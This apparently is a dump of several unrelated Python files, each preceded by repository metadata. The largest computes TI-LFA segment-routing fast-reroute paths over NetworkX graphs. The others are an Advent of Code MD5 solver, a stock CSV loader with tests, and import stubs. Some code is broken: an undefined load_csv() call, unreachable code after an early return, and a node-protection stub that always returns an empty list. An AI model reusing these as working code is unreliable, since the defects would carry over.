####:param bool trombone: Allow pq_node>dst path to trombone through p_node
:return None: __init__ shouldn't return anything
:rtype: None
"""
self.debug = 0
self.diagram = Diagram(debug=2)
self.ep_space = ep_space
self.path_types = ["tilfas_link", "tilfas_node"]
self.spf = spf(debug=self.debug)
###self.trombone = trombone
def check_sids(self, graph):
"""
Check that each node has a node SID and that each adjacency has an
adjacency SID, and they they are valid and unique.
:param networkx.Graph graph: NetworkX graph object
:return bool True: True if all SIDs are present and unique, else false
:rtype: bool
"""
node_sids = []
for node in graph.nodes():
if "node_sid" not in graph.nodes[node]:
raise Exception(
f"Node {node} is missing a node SID, can't run TI-LFA"
)
if type(graph.nodes[node]["node_sid"]) != int:
raise Exception(
f"Node {node} node SID is not an int, can't run TI-LFA"
)
node_sids.append(graph.nodes[node]["node_sid"])
if len(set(node_sids)) < len(node_sids):
raise Exception(
"Nodes found with non-unique node SIDs: "
f"{[sid for sid in node_sids if node_sids.count(sid) > 1]}"
)
adj_sids = []
for edge in graph.edges():
if "adj_sid" not in graph.edges[edge]:
raise Exception(
f"Link {edge} is missing an adjacency SID, can't run TI-LFA"
)
if type(graph.edges[edge]["adj_sid"]) != int:
raise Exception(
f"Link {edge} adjacency SID is not an int, can't run TI-LFA"
)
adj_sids.append(graph.edges[edge]["adj_sid"])
if len(set(adj_sids)) < len(adj_sids):
raise Exception(
"Links found with non-unique adjacency SIDs: "
f"{[sid for sid in adj_sids if adj_sids.count(sid) > 1]}"
)
def draw(self, graph, outdir, topology):
"""
Loop over the generated topologies and render them as diagram files.
:param networkx.Graph graph: NetworkX graph object
:param str outdir: String of the root output directory path
:param dict topology: Topology paths dict
:return bool True: True if all diagrams rendered otherwise False
:rtype: bool
"""
self.diagram.gen_sub_dirs(graph, outdir, self.path_types, topology)
for src, dst in [
(s, d) for d in graph.nodes for s in graph.nodes if s != d
]:
for path_type in self.path_types:
if path_type not in topology[src][dst]:
continue
if len(topology[src][dst][path_type]) < 1:
continue
tilfa_graph = graph.copy()
# Highlight the failed first-hop link as red
for path in topology[src][dst]["spf_metric"]:
tilfa_graph = self.diagram.highlight_fh_link(
"red",
tilfa_graph,
path,
)
# Highlight the failed first-hop node(s) as red
if path_type == "tilfas_node":
for path in topology[src][dst]["spf_metric"]:
tilfa_graph = self.diagram.highlight_fh_node(
"red",
tilfa_graph,
path,
)
for tilfa in topology[src][dst][path_type]:
# Highlight the path(s) from src to the PQ node(s)
for s_p_path in tilfa[0]:
print(f"s_p_path: {s_p_path}")
tilfa_graph = self.diagram.highlight_links(
"purple", tilfa_graph, s_p_path
)
tilfa_graph = self.diagram.highlight_nodes(
"purple", tilfa_graph, s_p_path
)
# Highlight the path(s) from the PQ node(s) to dst
for q_d_path in tilfa[1]:
print(f"q_d_path: {q_d_path}")
tilfa_graph = self.diagram.highlight_links(
"green", tilfa_graph, q_d_path
)
tilfa_graph = self.diagram.highlight_nodes(
"green", tilfa_graph, q_d_path
)
tilfa_graph = self.diagram.highlight_src_dst(
"lightblue", dst, tilfa_graph, src
)
# Add labels to links showing their cost
tilfa_graph = self.diagram.label_link_weights(tilfa_graph)
tilfa_graph = self.diagram.label_link_add_adjsid(tilfa_graph)
tilfa_graph = self.diagram.label_node_id(tilfa_graph)
tilfa_graph = self.diagram.label_node_add_nodesid(tilfa_graph)
self.diagram.gen_diagram(
(src + "_" + dst + "_" + path_type),
tilfa_graph,
os.path.join(outdir, src, path_type),
)
def gen_ep_space(self, dst, f_type, graph, src):
"""
Return a list of nodes in src's Extended P-space which avoid resource X
:param str dst: Dst node in "graph" to calculate EP-space not via X
:param networkx.Graph graph: NetworkX graph object
:param str src: Source node in "graph" to calculate EP-space from
:return ep_space: List of nodes in src's EP-space with respect to X
:rtype: list
"""
"""
TI-LFA Text:
The Extended P-space P'(R,X) of a node R w.r.t. a resource X is the
set of nodes that are reachable from R or a neighbor of R, without
passing through X.
"""
if f_type == "link":
ep_space = self.gen_link_p_space(dst, graph, src)
elif f_type == "node":
ep_space = self.gen_node_p_space(dst, graph, src)
else:
raise Exception(f"Unrecognised EP-space type {f_type}")
for nei in graph.neighbors(src):
if nei == dst:
continue
if f_type == "link":
n_p_space = self.gen_link_p_space(dst, graph, nei)
elif f_type == "node":
n_p_space = self.gen_node_p_space(dst, graph, nei)
else:
raise Exception(f"Unrecognised EP-space type {f_type}")
if src in n_p_space:
n_p_space.remove(src)
for ep_node in n_p_space:
"""
Skip EP-nodes which have the pre-failure first-hop link(s) from src
to dst in the pre-failure path(s) from src to EP-node:
"""
s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
s_d_fh_links = [(path[0], path[1]) for path in s_d_paths]
s_ep_paths = self.spf.gen_metric_paths(
dst=ep_node, graph=graph, src=src
)
s_ep_links = [
(path[idx], path[idx + 1])
for path in s_ep_paths
for idx in range(0, len(path) - 1)
]
overlap = [
link for link in s_ep_links if link in s_d_fh_links
]
if overlap:
if self.debug > 1:
print(
f"Skipping link EP-space node {ep_node} due "
f"to overlap:\n"
f"{s_ep_links},{ep_node}\n"
f"{s_d_fh_links},{dst}"
)
continue
if ep_node not in ep_space:
ep_space.append(ep_node)
return ep_space
def gen_link_p_space(self, dst, graph, src):
"""
Return a list of nodes in src's P-space relevant to the first-hop
link(s) towards dst.
:param str dst: Node in "graph" to calculate P-space to, avoiding S-F
:param networkx.Graph graph: NetworkX graph object
:param str src: Source node in "graph" which must avoid S-F link to Dst
:return p_space: List of nodes in src's P-space with respect to S-F
:rtype: list
"""
"""
TI-LFA Text:
The P-space P(R,X) of a node R w.r.t. a resource X (e.g. a link S-F,
a node F, or a SRLG) is the set of nodes that are reachable from R
without passing through X. It is the set of nodes that are not
downstream of X in SPT_old(R).
"""
s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
s_d_fh_links = [(path[0], path[1]) for path in s_d_paths]
if self.debug > 1:
print(
f"Checking for link protecting P-nodes of {src} not via "
f"link(s): {s_d_fh_links}"
)
p_space = []
for p_node in graph.nodes:
if p_node == src or p_node == dst:
continue
s_p_paths = self.spf.gen_metric_paths(
dst=p_node, graph=graph, src=src
)
"""
Skip P-nodes which have the pre-failure first-hop link(s) from src
to dst in the pre-failure path(s) from src to P-node:
"""
s_p_links = [
(path[idx], path[idx + 1])
for path in s_p_paths
for idx in range(0, len(path) - 1)
]
overlap = [
link for link in s_p_links if link in s_d_fh_links
]
if overlap:
if self.debug > 1:
print(
f"Skipping link protecting P-space node {p_node} due "
f"to overlap:\n"
f"{s_p_links},{p_node}\n"
f"{s_d_fh_links},{dst}"
)
continue
p_space.append(p_node)
return p_space
def gen_link_pq_space(self, dst, graph, link_q_space, src):
"""
Return the list of Q-space nodes which are link protecting against S-F
from S to D.
:param str dst: Destination node name in "graph"
:param networkx.Graph graph: NetworkX graph object
:param list link_q_space: List of Q-space nodes in "graph" relative to
D not via S-F
:param str src: Source node name in "graph"
:return link_pq_nodes: List of nodes in D's Q-space and in post-SPF
:rtype: list
"""
"""
TI-LFA Text:
4.2. Q-Space property computation for a link S-F, over post-convergence
paths
We want to determine which nodes on the post-convergence path from
the PLR to the destination D are in the Q-Space of destination D
w.r.t. link S-F.
This can be found by intersecting the post-convergence path to D,
assuming the failure of S-F, with Q(D, S-F).
"""
link_pq_space = []
# Get the pre-converge path(s) to D
pre_s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
pre_s_d_fh_links = [(src, path[1]) for path in pre_s_d_paths]
# Remove the pre-convergence first-hop link(s) from the graph
tmp_g = graph.copy()
for fh_link in pre_s_d_fh_links:
tmp_g.remove_edge(*fh_link)
# Re-calculate the path(s) to D in the failure state (post-convergence)
post_s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=tmp_g, src=src)
for post_s_d_path in post_s_d_paths:
for q_node in link_q_space: # Q-space doesn't include src or dst
if q_node in post_s_d_path:
link_pq_space.append(q_node)
return link_pq_space
def gen_link_q_space(self, dst, graph, src):
"""
Return a list of nodes in dst's Q-space which avoid link(s) S-F.
:param str dst: Dest node in "graph" to calculate Q-space for
:param networkx.Graph graph: NetworkX graph object
:param str src: Source node in "graph" relevant to S-F link
:return q_space: List of nodes in dst's Q-space with respect to S-F
:rtype: list
"""
"""
TI-LFA Text:
The Q-Space Q(D,X) of a destination node D w.r.t. a resource X is the
set of nodes which do not use X to reach D in the initial state of
the network. In other words, it is the set of nodes which have D in
their P-space w.r.t. S-F, F, or a set of links adjacent to S).
"""
q_space = []
s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
s_d_fh_links = [(src, path[1]) for path in s_d_paths]
for q_node in graph.nodes:
if q_node == src or q_node == dst:
continue
q_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=q_node)
"""
Skip Q-nodes which have the pre-failure first-hop link(s) from src
to dst in the pre-failure path(s) from P-node to dst:
"""
q_d_links = [
(path[idx], path[idx + 1])
for path in q_d_paths
for idx in range(0, len(path) - 1)
]
overlap = [
link for link in q_d_links if link in s_d_fh_links
]
if overlap:
if self.debug > 1:
print(
f"Skipping link protecting Q-space node {q_node} due "
f"to overlap:\n"
f"{q_d_links}\n"
f"{s_d_fh_links}"
)
continue
q_space.append(q_node)
return q_space
def gen_metric_link_tilfas(self, dst, graph, link_ep_space, link_pq_space, link_q_space, src):
"""
Return all link protecting TI-LFAs paths from src to dst.
Do this by returning all equal-cost explicit paths (based on metric,
not hop count) between "src" and "dst" nodes in "graph" that satisfy
the rules below.
:param str dst: Destination node name in "graph"
:param networkx.Graph graph: NetworkX graph object
:param list link_ep_space: EP- or P-space of Src node
:param list link_q_space: List of nodes in D's Q-space
:param list link_pq_space: List of nodes in D's Q-Space in post-SPF
:param str src: Source node name in "graph"
:return tilfa_paths: list of dict of TI-LFA paths
:rtype: list
"""
tilfa_paths = []
lfa_cost = 0
lfa_p_cost = 0
"""
TI-LFA Text:
5.1. FRR path using a direct neighbor
When a direct neighbor is in P(S,X) and Q(D,x) and on the post-
convergence path, the outgoing interface is set to that neighbor and
the repair segment list MUST be empty.
This is comparable to a post-convergence LFA FRR repair.
"""
for nei in graph.neighbors(src):
if nei in link_pq_space:
"""
Check that the neighbour/pq-node isn't reached via the same
failed fist hop link(s) toward dst:
"""
pre_s_pq_paths = self.spf.gen_metric_paths(dst=nei, graph=graph, src=src)
pre_s_pq_fh_links = [(src, path[1]) for path in pre_s_pq_paths]
pre_s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
pre_s_d_fh_links = [(src, path[1]) for path in pre_s_d_paths]
overlap = [
fh_link for fh_link in pre_s_d_fh_links if fh_link in pre_s_pq_fh_links
]
if overlap:
if self.debug > 1:
print(
f"Skipping directly connected neighbour {nei} due "
f"to overlap:\n"
f"{pre_s_pq_fh_links},{nei}\n"
f"{pre_s_d_fh_links},{dst}"
)
continue
if self.debug > 1:
print(
f"Directly connected neighbour {nei} is link "
f"protecting from {src} to {dst}"
)
n_d_paths = self.spf.gen_metric_paths(
dst=dst, graph=graph, src=nei
)
cost = self.spf.gen_path_cost(graph, [src] + n_d_paths[0])
if cost < lfa_cost or lfa_cost == 0:
lfa_cost = cost
tilfa_paths = [
(
[[src, nei]],
n_d_paths,
[[]]
)
]
if self.debug > 0:
print(f"TI-LFA 5.1.1: {tilfa_paths}")
elif cost == lfa_cost:
tilfa_paths.append(
([[src, nei]], [n_d_path for n_d_path in n_d_paths], [[]])
)
if self.debug > 0:
print(f"TI-LFA 5.1.2: {tilfa_paths}")
"""
TI-LFA Text:
5.2. FRR path using a PQ node
When a remote node R is in P(S,X) and Q(D,x) and on the post-
convergence path, the repair list MUST be made of a single node
segment to R and the outgoing interface MUST be set to the outgoing
interface used to reach R.
This is comparable to a post-convergence RLFA repair tunnel.
"""
for p_node in graph.nodes:
if p_node == src or p_node == dst:
continue
if p_node not in graph.neighbors(src):
if p_node in link_pq_space:
if self.debug > 1:
print(
f"Remote P-node {p_node} is link protecting from "
f"from {src} to {dst}"
)
# Get the pre-converge path(s) to D
pre_s_p_paths = self.spf.gen_metric_paths(dst=p_node, graph=graph, src=src)
pre_s_p_fh_links = [(src, path[1]) for path in pre_s_p_paths]
# Remove the pre-convergence the first-hop link(s) from the graph
tmp_g = graph.copy()
for fh_link in pre_s_p_fh_links:
tmp_g.remove_edge(*fh_link)
# Re-calculate the path(s) to D in the failure state (post-convergence)
post_s_p_paths = self.spf.gen_metric_paths(dst=p_node, graph=tmp_g, src=src)
p_d_paths = self.spf.gen_metric_paths(
dst=dst, graph=tmp_g, src=p_node
)
"""
Check if this path has a lower cost from src to dst
than the current TI-LFA path(s)
"""
cost = self.spf.gen_path_cost(tmp_g, post_s_p_paths[0] + p_d_paths[0][1:])
if cost < lfa_cost or lfa_cost == 0:
lfa_cost = cost
tilfa_paths = [
(
post_s_p_paths,
p_d_paths,
[graph.nodes[p_node]["node_sid"]]
)
]
if self.debug > 0:
print(f"TI-LFA 5.2.1: {tilfa_paths}")
# If it has the same cost...
elif cost == lfa_cost:
"""
Check if this path is the same as an existing TI-LFA,
but using a different repair node along the same path.
Prefer scenario 1 over scenario 2...
Scenario 1: [ src -> R1 ] + [ R2 -> R3 -> dst ]
Scenario 2: [ src -> R1 -> R2 ] + [ R3 -> dst ]
This hopefully reduces the required segment stack and
thus reduces the MTU required and likelihood for
excessive MPLS label push operations.
"""
for tilfa in tilfa_paths:
if tilfa[0][-1] != post_s_p_paths[0][-1]:
cost = self.spf.gen_path_cost(tmp_g, post_s_p_paths[0])
this_lfa = self.spf.gen_path_cost(tmp_g, tilfa[0][0]) ########## Can any of the paths to p_node be different cost?
if cost < this_lfa:
tilfa_paths = [
(
post_s_p_paths,
p_d_paths,
[graph.nodes[p_node]["node_sid"]]
)
]
if self.debug > 0:
print(f"TI-LFA 5.2.2: {tilfa_paths}")
break
# Else it's an ECMP path with the same cost to p_node
else:
tilfa_paths.append (
(
post_s_p_paths,
p_d_paths,
[graph.nodes[p_node]["node_sid"]]
)
)
if self.debug > 0:
print(f"TI-LFA 5.2.3: {tilfa_paths}")
"""
TI-LFA Text:
5.3. FRR path using a P node and Q node that are adjacent
When a node P is in P(S,X) and a node Q is in Q(D,x) and both are on
the post-convergence path and both are adjacent to each other, the
repair list MUST be made of two segments: A node segment to P (to be
processed first), followed by an adjacency segment from P to Q.
This is comparable to a post-convergence DLFA repair tunnel.
"""
for p_node in graph.nodes:
if p_node == src or p_node == dst:
continue
if p_node in link_ep_space:
if p_node not in link_pq_space:
for q_node in graph.neighbors(p_node):
if q_node == src or q_node == dst:
continue
if q_node in link_q_space:
if self.debug > 1:
print(
f"P-Node {p_node} is neighbour of "
f"{q_node}, which together are link "
f"protecting from {src} to {dst}"
)
s_p_paths = self.spf.gen_metric_paths(
dst=p_node, graph=graph, src=src
)
q_d_paths = self.spf.gen_metric_paths(
dst=dst, graph=graph, src=q_node
)
cost = self.spf.gen_path_cost(
graph, [s_p_paths[0] + q_d_paths[0][1:]]
)
if cost < lfa_cost or lfa_cost == 0:
lfa_cost = cost
tilfa_paths = [
(
[s_p_path + [q_node] for s_p_path in s_p_paths],
q_d_paths,
[
graph.nodes[p_node]["node_sid"],
graph.edges[(p_node, q_node)]["adj_sid"]
]
)
]
if self.debug > 0:
print(f"TI-LFA 5.3.1: {tilfa_paths}")
elif cost == lfa_cost:
tilfa_paths.append(
(
[s_p_path + [q_node] for s_p_path in s_p_paths],
q_d_paths,
[
graph.nodes[p_node]["node_sid"],
graph.edges[(p_node, q_node)]["adj_sid"]
]
)
)
if self.debug > 0:
print(f"TI-LFA 5.3.2: {tilfa_paths}")
"""
5.4. Connecting distant P and Q nodes along post-convergence paths
In some cases, there is no adjacent P and Q node along the post-
convergence path. However, the PLR can perform additional
computations to compute a list of segments that represent a loop-free
path from P to Q. How these computations are done is out of scope of
this document.
---
Thanks you bastards. We shall calculate any P to Q paths. If some
exist, calculate the Source to P paths, then append them together.
"""
# Get the pre-converge path(s) to D
pre_s_p_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
pre_s_p_fh_links = [(src, path[1]) for path in pre_s_p_paths]
# Remove the pre-convergence the first-hop link(s) from the graph
tmp_g = graph.copy()
for fh_link in pre_s_p_fh_links:
tmp_g.remove_edge(*fh_link)
"""
For each ep node calculate the post convergence path to each pq node.
Build a list of all these paths to get the lowest cost one.
"""
ep_nodes = [node for node in link_ep_space if node not in link_pq_space]
pq_nodes = [node for node in link_pq_space if node not in link_ep_space]
p_q_paths = []
p_q_cost = 0
for ep in ep_nodes:
for pq in pq_nodes:
post_p_q_paths = self.spf.gen_metric_paths(dst=pq, graph=tmp_g, src=ep)
if len(post_p_q_paths[0]) > 0:
for path in post_p_q_paths:
cost = self.spf.gen_path_cost(tmp_g, path)
if cost < p_q_cost or p_q_cost == 0:
p_q_paths = [path]
p_q_cost = cost
elif cost == p_q_cost:
if path not in p_q_paths:
p_q_paths.append(path)
if p_q_paths:
# If we found p to q paths, append them to s to p paths
s_q_paths = []
for p_q_path in p_q_paths:
p = p_q_path[0]
s_p_paths = self.spf.gen_metric_paths(dst=p, graph=tmp_g, src=src)
for s_p_path in s_p_paths:
s_q_paths.append(s_p_path + p_q_path[1:])
for s_q_path in s_q_paths:
cost = self.spf.gen_path_cost(tmp_g, s_q_path)
if cost < lfa_cost or lfa_cost == 0:
if self.debug > 1:
print(
f"Remote P & Q nodes in {s_q_path} are link "
f"protecting from {src} to {dst}"
)
q = s_q_path[-1]
q_d_paths = self.spf.gen_metric_paths(dst=dst, graph=tmp_g, src=q)
lfa_cost = cost
tilfa_paths = [
(
[s_q_path],
q_d_paths,
[
self.paths_adj_sids(tmp_g, [s_q_path])
]
)
]
if self.debug > 0:
print(f"TI-LFA 5.4.1: {tilfa_paths}")
elif cost == lfa_cost:
if self.debug > 1:
print(
f"Remote P & Q nodes in {s_q_path} are link "
f"protecting from {src} to {dst}"
)
q = s_q_path[-1]
q_d_paths = self.spf.gen_metric_paths(dst=dst, graph=tmp_g, src=q)
tilfa_paths.append(
(
[s_q_path],
q_d_paths,
[
self.paths_adj_sids(tmp_g, [s_q_path])
]
)
)
if self.debug > 0:
print(f"TI-LFA 5.4.2: {tilfa_paths}")
return tilfa_paths
def gen_metric_node_tilfas(self, dst, graph, node_ep_space, node_pq_space, src):
"""
Return all node protecting rLFAs.
Do this by filtering the list of link rLFAs "tilfas_link" for those
with pre-convergence best path(s) from all repair tunnel end-points
{p}, which don't pass through any of the first-hops of any of the
pre-convergence best-paths from src to dst.
:param str dst: Destination node name in "graph"
:param networkx.Graph graph: NetworkX graph object
:param list tilfas_link: list of link protecting rLFA paths in "graph"
:param str src: Source node name in "graph"
:return tilfas_node: List of tuples of equal-cost node protecting TI-LFAs to dst
:rtype: list
"""
tilfas_node = []
return tilfas_node
def gen_metric_paths(self, dst, graph, src):
"""
Return all TI-LFA paths between the "src" and "dst" nodes in "graph",
based on link metric (not hop count), which provide link and node
protection. Returned are all TI-LFA paths in a dict, keyed by type (link
or node), the key values are lists of tuples containing the path to
the P node and path from P to D.
:param str dst: Destination node name in "graph"
:param networkx.Graph graph: NetworkX graph object
:param str src: Source node name in "graph"
:return tilfa_paths: Dict with list(s) of tuples
:rtype: list
"""
tilfas = {}
if self.debug > 0:
print(f"Calculating TI-LFA paths from {src} to {dst}")
tilfas = {
"tilfas_link": [],
"tilfas_node": []
}
s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
# There are no paths between this src,dst pair
if not s_d_paths:
return tilfas
"""
TI-LFA Text:
5. TI-LFA Repair path
The TI-LFA repair path (RP) consists of an outgoing interface and a
list of segments (repair list (RL)) to insert on the SR header. The
repair list encodes the explicit post-convergence path to the
destination, which avoids the protected resource X and, at the same
time, is guaranteed to be loop-free irrespective of the state of FIBs
along the nodes belonging to the explicit path.
The TI-LFA repair path is found by intersecting P(S,X) and Q(D,X)
with the post-convergence path to D and computing the explicit SR-
based path EP(P, Q) from P to Q when these nodes are not adjacent
along the post convergence path. The TI-LFA repair list is expressed
generally as (Node_SID(P), EP(P, Q)).
"""
if self.ep_space:
link_ep_space = self.gen_ep_space(dst, "link", graph, src)
node_ep_space = self.gen_ep_space(dst, "node", graph, src)
if self.debug > 0:
print(f"link_ep_space: {link_ep_space}")
print(f"node_ep_space: {node_ep_space}")
else:
link_p_space = self.gen_link_p_space(dst, graph, src)
node_p_space = self.gen_node_p_space(dst, graph, src)
if self.debug > 0:
print(f"link_p_space: {link_p_space}")
print(f"node_p_space: {node_p_space}")
link_q_space = self.gen_link_q_space(dst, graph, src)
node_q_space = self.gen_node_q_space(dst, graph, src)
if self.debug > 0:
print(f"link_q_space: {link_q_space}")
print(f"node_q_space: {node_q_space}")
link_pq_space = self.gen_link_pq_space(dst, graph, link_q_space, src)
node_pq_space = self.gen_node_pq_space(dst, graph, node_q_space, src)
if self.debug > 0:
print(f"link_pq_space: {link_pq_space}")
print(f"node_pq_space: {node_pq_space}")
if self.ep_space:
link_tilfas = self.gen_metric_link_tilfas(dst, graph, link_ep_space, link_pq_space, link_q_space, src)
else:
link_tilfas = self.gen_metric_link_tilfas(dst, graph, link_p_space, link_pq_space, link_q_space, src)
if self.debug > 0:
print(f"link_tilfas: {link_tilfas}")
tilfas["tilfas_link"] = link_tilfas
return tilfas
############################
if self.ep_space:
node_tilfas = self.gen_metric_node_tilfas(dst, graph, node_ep_space, node_pq_space, src)
else:
node_tilfas = self.gen_metric_node_tilfas(dst, graph, node_p_space, node_pq_space, src)
if self.debug > 0:
print(f"node_tilfas: {node_tilfas}")
tilfas["tilfas_node"] = node_tilfas
return tilfas
def gen_node_p_space(self, dst, graph, src):
"""
Return a list of nodes in src's P-space relevant to the first-hop
nodes(s) towards dst.
:param str dst: Node in "graph" to calculate P-space to, avoiding F
:param networkx.Graph graph: NetworkX graph object
:param str src: Source node in "graph" which must avoid F node to Dst
:return p_space: List of nodes in src's P-space with respect to F
:rtype: list
"""
"""
TI-LFA Text:
The P-space P(R,X) of a node R w.r.t. a resource X (e.g. a link S-F,
a node F, or a SRLG) is the set of nodes that are reachable from R
without passing through X. It is the set of nodes that are not
downstream of X in SPT_old(R).
"""
s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
s_d_fhs = [path[1] for path in s_d_paths]
if self.debug > 1:
print(
f"Checking for node protecting P-space nodes of {src} not via "
f"first-hop(s): {s_d_fhs}"
)
p_space = []
for p_node in graph.nodes:
# Exclude nodes which are a first-hop towards dst:
if p_node == src or p_node == dst:
continue
if p_node in s_d_fhs:
if self.debug > 1:
print(
f"Skipping node protecting P-space node {p_node} "
f"because it is a first-hop(s) towards {dst}: "
f"{s_d_fhs}"
)
continue
s_p_paths = self.spf.gen_metric_paths(
dst=p_node, graph=graph, src=src
)
"""
Check if any of the p_node->dst path(s) contain any of the
first-hop(s) from src->dst, those are the nodes we want to avoid.
"""
overlap = [
fh for fh in s_d_fhs for s_p_path in s_p_paths if fh in s_p_path
]
if overlap:
if self.debug > 1:
print(
f"Skipping node protecting P-space node {p_node}, "
f"path(s) from {src} to {p_node} overlap with "
f"first-hop(s) in path(s) from {src} to {dst}: "
f"{s_p_paths}"
)
continue
p_space.append(p_node)
return p_space
def gen_node_pq_space(self, dst, graph, node_q_space, src):
"""
Return the list of Q-space nodes which are node protecting against F
from S to D.
:param str dst: Destination node name in "graph"
:param networkx.Graph graph: NetworkX graph object
:param list node_q_space: List of Q-space nodes in "graph" relative to
D not via F
:param str src: Source node name in "graph"
:return node_pq_space: List of nodes in D's Q-space and in post-SPF
:rtype: list
"""
"""
TI-LFA Text:
4.4. Q-Space property computation for a node F, over post-convergence
paths
We want to determine which nodes on the post-convergence from the PLR
to the destination D are in the Q-Space of destination D w.r.t. node
F.
This can be found by intersecting the post-convergence path to D,
assuming the failure of F, with Q(D, F).
"""
node_pq_space = []
# Get the pre-converge path(s) to D and remove the first-hop node(s)
pre_s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
pre_s_d_fh_nodes = [path[1] for path in pre_s_d_paths]
# There are no node protecting paths for a directly connected neighbour
for fh_node in pre_s_d_fh_nodes:
if fh_node in graph.neighbors(src):
return node_pq_space
tmp_g = graph.copy()
for fh_node in pre_s_d_fh_nodes:
tmp_g.remove_node(fh_node)
# Recalculate the path(s) to D in the failure state (post-convergence)
post_s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=tmp_g, src=src)
for post_s_d_path in post_s_d_paths:
for q_node in node_q_space:
if q_node in post_s_d_path:
node_pq_space.append(q_node)
return node_pq_space
def gen_node_q_space(self, dst, graph, src):
"""
Return a list of nodes in dst's Q-space which avoid node(s) F.
:param str dst: Dest node in "graph" to calculate Q-space for
:param networkx.Graph graph: NetworkX graph object
:param str src: Source node in "graph" relevant to F node
:return q_space: List of nodes in dst's Q-space with respect to F
:rtype: list
"""
"""
TI-LFA Text:
The Q-Space Q(D,X) of a destination node D w.r.t. a resource X is the
set of nodes which do not use X to reach D in the initial state of
the network. In other words, it is the set of nodes which have D in
their P-space w.r.t. S-F, F, or a set of links adjacent to S).
"""
q_space = []
s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
s_d_fhs = [path[1] for path in s_d_paths]
for q_node in graph.nodes:
if q_node == src or q_node == dst:
continue
q_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=q_node)
overlap = [
s_d_fh for s_d_fh in s_d_fhs for q_d_path in q_d_paths if s_d_fh in q_d_path
]
if overlap:
if self.debug > 1:
print(
f"Skipping node protecting Q-Space node {q_node}, "
f"path to {dst} overlaps with hop(s) in path(s) from "
f"{src} toward {dst}: {q_d_paths}"
)
continue
q_space.append(q_node)
return q_space
def init_topo(self, graph, topo):
"""
Create empty dict keys for all possible paths this class can generate
:return None:
:rtype: None
"""
for src in graph.nodes:
for dst in graph.nodes:
if src == dst:
continue
for path_type in self.path_types:
if path_type not in topo[src][dst]:
topo[src][dst][path_type] = []
def paths_adj_sids(self, graph, paths):
"""
Return lists of adj SIDs that will steer along the explicit path
:param networkx.Graph graph: NetworkX graph object
:param list paths: List of list of nodes that form the explicit path(s)
:return adj_sids: List of adj SIDs along path
:rtype: list of lists
"""
adj_sids = []
for path in paths:
sids = []
for idx, node in enumerate(path):
if idx < (len(path) - 1):
sids.append(graph.edges[(node, path[idx + 1])]["adj_sid"])
adj_sids.append(sids)
if self.debug > 1:
print(f"path_adj_sids: {adj_sids}")
return adj_sids
| 2.8125 | 3 |
fuse/ext/__init__.py | hanslovsky/gunpowder-nodes | 1 | 12766801 | from __future__ import print_function
import logging
import traceback
import sys
logger = logging.getLogger(__name__)
class NoSuchModule(object):
def __init__(self, name):
self.__name = name
self.__traceback_str = traceback.format_tb(sys.exc_info()[2])
errtype, value = sys.exc_info()[:2]
self.__exception = errtype(value)
def __getattr__(self, item):
raise self.__exception
try:
import z5py
except ImportError:
z5py = NoSuchModule('z5py') | 2.421875 | 2 |
2015/day04/solution.py | loisaidasam/adventofcode | 0 | 12766802 |
import hashlib
import sys
def solve(secret_key, starts_with):
result = 1
while True:
hash_input = "%s%s" % (secret_key, result)
hash_result = hashlib.md5(hash_input).hexdigest()
if hash_result.startswith(starts_with):
return result
result += 1
if __name__ == '__main__':
"""
$ python solution.py yzbqklnj 00000
First decimal that creates a hash that starts with `00000` based on secret key `yzbqklnj`: 282749
$ python solution.py yzbqklnj 000000
First decimal that creates a hash that starts with `000000` based on secret key `yzbqklnj`: 9962624
"""
secret_key = sys.argv[1]
starts_with = sys.argv[2]
result = solve(secret_key, starts_with)
print "First decimal that creates a hash that starts with `%s` based on secret key `%s`: %s" % (
starts_with,
secret_key,
result
)
| 3.859375 | 4 |
stocks.py | hjwp/datascience-from-scratch | 1 | 12766803 | <filename>stocks.py
import csv
from dataclasses import dataclass
from typing import Any, List, Dict, NamedTuple
NUMBER_COLUMNS = ["Open", "Close", "High", "Low", "Adj Close", "Volume"]
@dataclass(frozen=True)
class Stock:
name: str
opening_price: float
closing_price: float
def fix_row(raw_row: Dict[str, str]) -> Dict[str, Any]:
fixed = {} # type: Dict[str, Any]
for column_name, string_value in raw_row.items():
if column_name in NUMBER_COLUMNS:
fixed[column_name] = float(string_value)
else:
fixed[column_name] = string_value
return fixed
def load_csv_dicts() -> List[Dict[str, Any]]:
with open("stocks.csv") as f:
reader = csv.DictReader(f.readlines())
return [fix_row(raw_row) for raw_row in list(reader)]
def load_csv_objects() -> List:
row_dicts = load_csv_dicts()
results = []
for raw_row in row_dicts:
stock = Stock(
name=raw_row["Symbol"],
opening_price=raw_row["Open"],
closing_price=raw_row["Close"],
)
results.append(stock)
return results
def main():
all_stocks = load_csv()
print(all_stocks[0])
print(all_stocks[1])
def test_load_csv_dicts_parses_numbers():
all_stocks = load_csv_dicts()
assert all_stocks[0]["Open"] == 0.513393
assert all_stocks[0]["Close"] == 0.513393
assert all_stocks[0]["High"] == 0.515625
assert all_stocks[0]["Low"] == 0.513393
assert all_stocks[0]["Adj Close"] == 0.023106
assert all_stocks[0]["Volume"] == 117258400
for column_name in NUMBER_COLUMNS:
assert all_stocks[0][column_name] == float(all_stocks[0][column_name])
def test_load_csv_objects_parses_numbers():
all_stocks = load_csv_objects()
example_stock = all_stocks[0]
assert example_stock.name == "AAPL"
assert example_stock.opening_price == 0.513393
def test_stock():
mystock = Stock("stocky", opening_price=100, closing_price=200)
assert mystock.name == "stocky"
assert mystock.opening_price == 100
assert mystock.closing_price == 200
if __name__ == "__main__":
print("-" * 80)
main()
| 3.546875 | 4 |
e3d/model_management/ModelInstanceClass.py | jr-garcia/Engendro3D | 8 | 12766804 | from .MaterialClass import Material
# from ..SoundClass import Sound
from ..Base3DObjectClass import Base3DObject
